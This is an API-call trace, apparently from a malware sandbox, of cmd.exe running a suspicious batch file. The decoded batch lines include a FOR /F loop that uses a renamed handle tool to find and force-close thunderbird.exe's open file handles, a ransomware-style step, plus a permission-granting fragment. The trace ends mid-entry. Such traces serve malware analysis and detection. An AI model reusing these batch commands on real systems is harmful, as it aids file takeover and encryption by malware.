[0199.345] SetFilePointer (in: hFile=0x78, lDistanceToMove=78, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4e [0199.345] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49dc6640, cbMultiByte=15, lpWideCharStr=0x49dcc640, cchWideChar=8191 | out: lpWideCharStr="cd /d \"%~dp0\"\r\n\nUSERNAME%:F /C\r\n") returned 15 [0199.345] _get_osfhandle (_FileHandle=3) returned 0x78 [0199.345] GetFileType (hFile=0x78) returned 0x1 [0199.345] _get_osfhandle (_FileHandle=3) returned 0x78 [0199.345] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4e [0199.345] GetProcessHeap () returned 0x590000 [0199.345] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x400a) returned 0x5b4b28 [0199.346] GetProcessHeap () returned 0x590000 [0199.346] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x70) returned 0x5a4190 [0199.346] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat", nBufferLength=0x208, lpBuffer=0x26ed70, lpFilePart=0x26ed68 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat", lpFilePart=0x26ed68*="Ch81ANBE.bat") returned 0x32 [0199.346] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x26ea84 | out: lpFindFileData=0x26ea84*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2b8829a0, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x2b8829a0, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x591258 [0199.347] FindClose (in: hFindFile=0x591258 | out: hFindFile=0x591258) returned 1 [0199.347] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x26ea84 | out: lpFindFileData=0x26ea84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2b8829a0, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x2b8829a0, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x591258 [0199.347] FindClose (in: hFindFile=0x591258 | out: hFindFile=0x591258) returned 1 [0199.347] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0199.347] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x26ea84 | out: lpFindFileData=0x26ea84*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x444bc0, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x444bc0, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x591258 [0199.347] FindClose (in: hFindFile=0x591258 | out: hFindFile=0x591258) returned 1 [0199.348] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat", lpFindFileData=0x26ea84 | out: lpFindFileData=0x26ea84*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfb0ce860, ftCreationTime.dwHighDateTime=0x1d68286, ftLastAccessTime.dwLowDateTime=0xfb0ce860, ftLastAccessTime.dwHighDateTime=0x1d68286, ftLastWriteTime.dwLowDateTime=0xfb0ce860, ftLastWriteTime.dwHighDateTime=0x1d68286, nFileSizeHigh=0x0, nFileSizeLow=0xe2, dwReserved0=0x0, dwReserved1=0x0, cFileName="Ch81ANBE.bat", cAlternateFileName="")) returned 0x591258 [0199.348] FindClose (in: hFindFile=0x591258 | out: hFindFile=0x591258) returned 1 [0199.348] GetProcessHeap () returned 0x590000 [0199.348] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x56) returned 0x591258 [0199.348] GetProcessHeap () returned 0x590000 [0199.348] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5b4b28 | out: hHeap=0x590000) returned 1 [0199.351] _tell (_FileHandle=3) returned 78 [0199.351] _close (_FileHandle=3) returned 0 [0199.352] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x26f3b4 | out: _Buffer="\r\n") returned 2 [0199.352] _get_osfhandle (_FileHandle=1) returned 0x7 [0199.352] GetFileType (hFile=0x7) returned 0x2 [0199.352] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0199.352] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x26f374 | out: lpMode=0x26f374) returned 1 [0199.353] _get_osfhandle (_FileHandle=1) returned 0x7 [0199.353] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x26f3a0, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x26f3a0*=0x2) returned 1 [0199.355] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0199.355] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0199.355] _vsnwprintf (in: _Buffer=0x49dc5e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x26f3b0 | out: _Buffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 37 [0199.356] _vsnwprintf (in: _Buffer=0x49dc5e8a, _BufferCount=0x3d9, _Format="%c", _ArgList=0x26f3b0 | out: _Buffer=">") returned 1 [0199.356] _get_osfhandle (_FileHandle=1) returned 0x7 [0199.356] GetFileType (hFile=0x7) returned 0x2 [0199.356] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0199.356] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x26f378 | out: lpMode=0x26f378) returned 1 [0199.768] _get_osfhandle (_FileHandle=1) returned 0x7 [0199.768] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dc5e40*, nNumberOfCharsToWrite=0x26, lpNumberOfCharsWritten=0x26f3a4, lpReserved=0x0 | out: lpBuffer=0x49dc5e40*, lpNumberOfCharsWritten=0x26f3a4*=0x26) returned 1 [0199.768] _get_osfhandle (_FileHandle=1) returned 0x7 [0199.768] GetFileType (hFile=0x7) returned 0x2 [0199.769] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0199.769] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x26f5fc | out: lpMode=0x26f5fc) returned 1 [0199.769] _get_osfhandle (_FileHandle=1) returned 0x7 [0199.769] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x590dc0*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x26f628, lpReserved=0x0 | out: lpBuffer=0x590dc0*, lpNumberOfCharsWritten=0x26f628*=0x2) returned 1 [0199.770] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x26f634 | out: _Buffer=" /d \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\\" ") returned 45 [0199.770] _get_osfhandle (_FileHandle=1) returned 0x7 [0199.770] GetFileType (hFile=0x7) returned 0x2 [0199.770] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0199.770] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x26f5f4 | out: lpMode=0x26f5f4) returned 1 [0199.771] _get_osfhandle (_FileHandle=1) returned 0x7 [0199.771] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2d, lpNumberOfCharsWritten=0x26f620, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x26f620*=0x2d) returned 1 [0200.523] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x26f654 | out: _Buffer="\r\n") returned 2 [0200.523] _get_osfhandle (_FileHandle=1) returned 0x7 [0200.523] GetFileType (hFile=0x7) returned 0x2 [0200.523] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0200.523] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x26f614 | out: lpMode=0x26f614) returned 1 [0200.524] _get_osfhandle (_FileHandle=1) returned 0x7 [0200.524] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x26f640, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x26f640*=0x2) returned 1 [0200.525] _wcsicmp (_String1="cd", _String2="DIR") returned -1 [0200.526] _wcsicmp (_String1="cd", _String2="ERASE") returned -2 [0200.526] _wcsicmp (_String1="cd", _String2="DEL") returned -1 [0200.526] _wcsicmp (_String1="cd", _String2="TYPE") returned -17 [0200.526] _wcsicmp (_String1="cd", _String2="COPY") returned -11 [0200.526] _wcsicmp (_String1="cd", _String2="CD") returned 0 [0200.526] GetConsoleTitleW (in: lpConsoleTitle=0x26f1c4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0200.527] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x26ef80, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x26ef78, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x26ef78*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0200.528] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", nBufferLength=0x104, lpBuffer=0x26ed1c, lpFilePart=0x26ed18 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpFilePart=0x26ed18*=0x0) returned 0x26 [0200.528] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0200.528] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x26ea98 | out: lpFindFileData=0x26ea98*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2b8829a0, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x2b8829a0, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x5a44e8 [0200.528] FindClose (in: hFindFile=0x5a44e8 | out: hFindFile=0x5a44e8) returned 1 [0200.528] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x26ea98 | out: lpFindFileData=0x26ea98*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2b8829a0, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x2b8829a0, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x5a44e8 [0200.528] FindClose (in: hFindFile=0x5a44e8 | out: hFindFile=0x5a44e8) returned 1 [0200.528] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0200.529] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x26ea98 | out: lpFindFileData=0x26ea98*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x444bc0, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x444bc0, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x5a44e8 [0200.529] FindClose (in: hFindFile=0x5a44e8 | out: hFindFile=0x5a44e8) returned 1 [0200.529] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0200.529] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0200.529] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0200.529] GetProcessHeap () returned 0x590000 [0200.529] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a76d0 | out: hHeap=0x590000) returned 1 [0200.529] GetEnvironmentStringsW () returned 0x5a6b40* [0200.529] GetProcessHeap () returned 0x590000 [0200.529] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0xb86) returned 0x5a76d0 [0200.529] FreeEnvironmentStringsW (penv=0x5a6b40) returned 1 [0200.529] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0200.530] GetProcessHeap () returned 0x590000 [0200.530] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a4488 | out: hHeap=0x590000) returned 1 [0200.530] GetProcessHeap () returned 0x590000 [0200.530] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a4428 | out: hHeap=0x590000) returned 1 [0200.530] _get_osfhandle (_FileHandle=1) returned 0x7 [0200.530] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0200.530] _get_osfhandle (_FileHandle=1) returned 0x7 [0200.530] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49dc41ac | out: lpMode=0x49dc41ac) returned 1 [0200.531] _get_osfhandle (_FileHandle=0) returned 0x3 [0200.531] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49dc41b0 | out: lpMode=0x49dc41b0) returned 1 [0200.531] SetConsoleInputExeNameW () returned 0x1 [0200.531] GetConsoleOutputCP () returned 0x1b5 [0200.531] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0200.531] SetThreadUILanguage (LangId=0x0) returned 0x409 [0200.532] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ch81anbe.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x26f5fc, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0200.533] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0200.533] _get_osfhandle (_FileHandle=3) returned 0x78 [0200.533] SetFilePointer (in: hFile=0x78, lDistanceToMove=78, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4e [0200.533] GetProcessHeap () returned 0x590000 [0200.533] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a43b8 | out: hHeap=0x590000) returned 1 [0200.533] GetProcessHeap () returned 0x590000 [0200.533] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a4348 | out: hHeap=0x590000) returned 1 [0200.533] GetProcessHeap () returned 0x590000 [0200.533] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a42d8 | out: hHeap=0x590000) returned 1 [0200.533] GetProcessHeap () returned 0x590000 [0200.533] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a4268 | out: hHeap=0x590000) returned 1 [0200.533] GetProcessHeap () returned 0x590000 [0200.533] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x590db8 | out: hHeap=0x590000) returned 1 [0200.533] GetProcessHeap () returned 0x590000 [0200.533] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a4208 | out: hHeap=0x590000) returned 1 [0200.533] GetProcessHeap () returned 0x590000 [0200.533] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x591258 | out: hHeap=0x590000) returned 1 [0200.533] GetProcessHeap () returned 0x590000 [0200.533] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a4190 | out: hHeap=0x590000) returned 1 [0200.534] _get_osfhandle (_FileHandle=3) returned 0x78 [0200.534] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4e [0200.534] ReadFile (in: hFile=0x78, lpBuffer=0x49dc6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x26f5e0, lpOverlapped=0x0 | out: lpBuffer=0x49dc6640*, lpNumberOfBytesRead=0x26f5e0*=0x94, lpOverlapped=0x0) returned 1 [0200.535] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49dc6640, cbMultiByte=148, lpWideCharStr=0x49dcc640, cchWideChar=8191 | out: lpWideCharStr="FOR /F \"UseBackQ Tokens=3,6 delims=: \" %%I IN (`tdq963ii.exe -accepteula %FN% -nobanner`) DO (tdq963ii.exe -accepteula -c %%J -y -p %%I -nobanner)\r\n") returned 148 [0200.535] _get_osfhandle (_FileHandle=3) returned 0x78 [0200.535] GetFileType (hFile=0x78) returned 0x1 [0200.535] _get_osfhandle (_FileHandle=3) returned 0x78 [0200.535] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xe2 [0200.535] GetProcessHeap () returned 0x590000 [0200.535] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x400a) returned 0x5b4b28 [0200.536] GetProcessHeap () returned 0x590000 [0200.536] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x4008) returned 0x5b8b40 [0200.537] GetProcessHeap () returned 0x590000 [0200.537] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0xe) returned 0x590db8 [0200.537] GetEnvironmentVariableW (in: lpName="FN", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="\"thunderbird.exe\"") returned 0x11 [0200.537] GetProcessHeap () returned 0x590000 [0200.538] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x590db8 | out: hHeap=0x590000) returned 1 [0200.538] GetProcessHeap () returned 0x590000 [0200.538] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5b8b40 | out: hHeap=0x590000) returned 1 [0200.538] GetProcessHeap () returned 0x590000 [0200.538] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5b4b28 | out: hHeap=0x590000) returned 1 [0200.546] _tell (_FileHandle=3) returned 226 [0200.546] _close (_FileHandle=3) returned 0 [0200.546] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x26f3b4 | out: _Buffer="\r\n") returned 2 [0200.546] _get_osfhandle (_FileHandle=1) returned 0x7 [0200.546] GetFileType (hFile=0x7) returned 0x2 [0200.547] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0200.547] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x26f374 | out: lpMode=0x26f374) returned 1 [0200.547] _get_osfhandle (_FileHandle=1) returned 0x7 [0200.547] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x26f3a0, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x26f3a0*=0x2) returned 1 [0200.549] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0200.549] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0200.549] _vsnwprintf (in: _Buffer=0x49dc5e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x26f3b0 | out: _Buffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 37 [0200.550] _vsnwprintf (in: _Buffer=0x49dc5e8a, _BufferCount=0x3d9, _Format="%c", _ArgList=0x26f3b0 | out: _Buffer=">") returned 1 [0200.550] _get_osfhandle (_FileHandle=1) returned 0x7 [0200.550] GetFileType (hFile=0x7) returned 0x2 [0200.550] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0200.550] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x26f378 | out: lpMode=0x26f378) returned 1 [0200.550] _get_osfhandle (_FileHandle=1) returned 0x7 [0200.550] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dc5e40*, nNumberOfCharsToWrite=0x26, lpNumberOfCharsWritten=0x26f3a4, lpReserved=0x0 | out: lpBuffer=0x49dc5e40*, lpNumberOfCharsWritten=0x26f3a4*=0x26) returned 1 [0200.551] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="%.3s", _ArgList=0x26f634 | out: _Buffer="FOR") returned 3 [0200.551] _get_osfhandle (_FileHandle=1) returned 0x7 [0200.551] GetFileType (hFile=0x7) returned 0x2 [0200.551] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0200.551] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x26f5f4 | out: lpMode=0x26f5f4) returned 1 [0200.552] _get_osfhandle (_FileHandle=1) returned 0x7 [0200.552] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0x26f620, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x26f620*=0x3) returned 1 [0200.552] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format=" %s", _ArgList=0x26f634 | out: _Buffer=" /F") returned 3 [0200.552] _get_osfhandle (_FileHandle=1) returned 0x7 [0200.552] GetFileType (hFile=0x7) returned 0x2 [0200.553] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0200.553] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x26f5f4 | out: lpMode=0x26f5f4) returned 1 [0200.553] _get_osfhandle (_FileHandle=1) returned 0x7 [0200.553] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0x26f620, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x26f620*=0x3) returned 1 [0200.554] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format=" %s", _ArgList=0x26f634 | out: _Buffer=" \"UseBackQ Tokens=3,6 delims=: \"") returned 32 [0200.554] _get_osfhandle (_FileHandle=1) returned 0x7 [0200.554] GetFileType (hFile=0x7) returned 0x2 [0200.554] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0200.554] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x26f5f4 | out: lpMode=0x26f5f4) returned 1 [0200.555] _get_osfhandle (_FileHandle=1) returned 0x7 [0200.555] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x20, lpNumberOfCharsWritten=0x26f620, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x26f620*=0x20) returned 1 [0200.555] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0x26f634 | out: _Buffer=" %I IN ") returned 7 [0200.555] _get_osfhandle (_FileHandle=1) returned 0x7 [0200.555] GetFileType (hFile=0x7) returned 0x2 [0200.555] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0200.555] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x26f5f4 | out: lpMode=0x26f5f4) returned 1 [0200.556] _get_osfhandle (_FileHandle=1) returned 0x7 [0200.556] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0x26f620, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x26f620*=0x7) returned 1 [0200.558] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="(%s) %s ", _ArgList=0x26f630 | out: _Buffer="(`tdq963ii.exe -accepteula \"thunderbird.exe\" -nobanner`) DO ") returned 60 [0200.558] _get_osfhandle (_FileHandle=1) returned 0x7 [0200.558] GetFileType (hFile=0x7) returned 0x2 [0200.558] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0200.558] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x26f5f0 | out: lpMode=0x26f5f0) returned 1 [0200.559] _get_osfhandle (_FileHandle=1) returned 0x7 [0200.559] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x3c, lpNumberOfCharsWritten=0x26f61c, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x26f61c*=0x3c) returned 1 [0200.559] _get_osfhandle (_FileHandle=1) returned 0x7 [0200.559] GetFileType (hFile=0x7) returned 0x2 [0200.560] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0200.560] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x26f5fc | out: lpMode=0x26f5fc) returned 1 [0200.560] _get_osfhandle (_FileHandle=1) returned 0x7 [0200.560] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dbbd04*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x26f628, lpReserved=0x0 | out: lpBuffer=0x49dbbd04*, lpNumberOfCharsWritten=0x26f628*=0x1) returned 1 [0200.560] _get_osfhandle (_FileHandle=1) returned 0x7 [0200.561] GetFileType (hFile=0x7) returned 0x2 [0200.561] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0200.561] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x26f5e0 | out: lpMode=0x26f5e0) returned 1 [0200.561] _get_osfhandle (_FileHandle=1) returned 0x7 [0200.561] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5a43a0*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x26f60c, lpReserved=0x0 | out: lpBuffer=0x5a43a0*, lpNumberOfCharsWritten=0x26f60c*=0xc) returned 1 [0200.562] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x26f618 | out: _Buffer=" -accepteula -c %J -y -p %I -nobanner ") returned 38 [0200.562] _get_osfhandle (_FileHandle=1) returned 0x7 [0200.562] GetFileType (hFile=0x7) returned 0x2 [0200.562] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0200.562] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x26f5d8 | out: lpMode=0x26f5d8) returned 1 [0200.563] _get_osfhandle (_FileHandle=1) returned 0x7 [0200.563] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x26, lpNumberOfCharsWritten=0x26f604, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x26f604*=0x26) returned 1 [0200.565] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x26f634 | out: _Buffer=") ") returned 2 [0200.565] _get_osfhandle (_FileHandle=1) returned 0x7 [0200.565] GetFileType (hFile=0x7) 